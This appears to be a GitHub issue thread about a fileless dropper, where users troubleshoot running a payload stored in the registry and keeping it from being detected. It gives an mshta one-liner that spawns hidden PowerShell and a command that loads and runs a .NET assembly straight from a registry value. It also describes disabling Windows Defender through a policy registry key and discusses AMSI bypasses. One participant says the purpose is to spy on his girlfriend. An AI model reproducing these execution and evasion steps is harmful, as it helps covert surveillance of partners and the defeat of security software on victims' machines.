Closed AlizerUncaged closed 1 year ago
I ran this in Windows Terminal and it popped up another tab in the terminal with a fresh powershell window. Also the binary from my website seems to work.
mshta "javascript:close(new ActiveXObject('WScript.Shell').run('powershell'))"
Do you have more info for me or anything else going on on your system so that it works here but not on your machine? In particular, did you try to deactivate your AV?
By the way from tomorrow on until 20. April I'm out of town, but I will catch up with you afterwards.
Seems like Windows Defender is now blocking this script.
Might be... Since this repo is public, the executable sure is detectable. The same applies to all of my projects hosted here. If you need it undetectable, you need to apply changes until it no longer is detected - and not share your work with others.
Edit:
Why do we have to use mshta anyways? Can't we just directly spawn a Powershell process?
You can. But the powershell window is briefly visible and mshta is the way I fixed this.
Looks like it's not only mshta
as well, I tried
powershell -NoExit [System.Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Phone").GetValue("Country")).EntryPoint.Invoke($null, @($null))
But now I get
Alright so I was able to solve the problem by disabling Defender via the dropper itself, it does it by adding a new DWORD named DisableWinDefender
at Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender
and settings its value to 1
, I can finally spy on my girlfriend again, thanks!
This script contains malicious content and has been blocked
is an error caused by an AMSI detection. If you do Assembly.Load()
in .NET, the framework will send the binary to AV for analysis via AMSI. So it's rather a detection issue, not a defunct executable.
There are some AMSI bypasses around, however it's tricky to do that using just 260 characters. In my other project, r77, I'm using a scheduled task that does not have that limitation, for example.
Seems like this is patched in Windows 11, calling![image](https://user-images.githubusercontent.com/86959368/229354951-54e19763-2c7c-4dd6-a778-2fe8e0579a14.png)
run()
fromWScript.Shell
results in Access is denied.Edit: Why do we have to use
mshta
anyways? Can't we just directly spawn a Powershell process?Edit 2: Oh look at that it's also issue #11, lol.